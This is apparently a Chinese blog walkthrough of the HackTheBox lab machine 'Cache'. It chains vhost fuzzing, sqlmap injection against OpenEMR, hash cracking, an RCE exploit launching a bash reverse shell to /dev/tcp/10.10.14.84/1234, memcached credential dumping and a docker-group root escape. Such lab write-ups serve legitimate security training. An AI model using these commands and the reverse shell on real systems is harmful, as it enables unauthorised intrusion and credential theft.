靶机:10.10.10.188

在login.html的js源码中发现账号
在这里插入图片描述
登陆后来到author.html,这里好像有点脑洞,用crew生成字典,然后wfuzz找域名

cewl -w w.txt -d 10 -m 1 http://10.10.10.188/author.html
wfuzz -w w.txt -H "HOST: FUZZ.htb" -u "http://10.10.10.188"

000000037:   302        0 L      0 W      0 Ch        "HMS"

/etc/hosts加条host
在这里插入图片描述
直接找openemr的exp

在这里插入图片描述
这个rce需要先登陆,考虑先sql注入出密码,先注册用户,http://hms.htb/portal/add_edit_event_user.php?eid=1是注入点,抓个请求包,然后

sqlmap -r re.txt -D openemr -T users_secure --dump

在这里插入图片描述
john爆破
在这里插入图片描述
然后拿去跑exp

python 45161.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.84/1234 0>&1'

在这里插入图片描述
这里如果直接su会报错,
在这里插入图片描述
这里可以用

/usr/bin/script -qc /bin/bash /dev/null

然后su到ash用户

netstat -tulpn

在这里插入图片描述
发现有11211端口,这个端口对应着memcached服务,存在未授权访问

telnet 127.0.0.1 11211
stats #统计memcached的运行信息
stats items #列出所有key
stats cachedump 1 0 #dump key

在这里插入图片描述
拿到另一个用户的密码
在这里插入图片描述
发现luffy是docker用户组
在这里插入图片描述
https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

在这里插入图片描述

reference
https://ca0y1h.top/Target_drone/HackTheBox/18.HTB-Cache-walkthrough/#HTB-Cache-Walkthrough
https://medium.com/@v0lk0va5/cache-hackthebox-writeup-d562bf5d3d8

分类: HTB

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*

code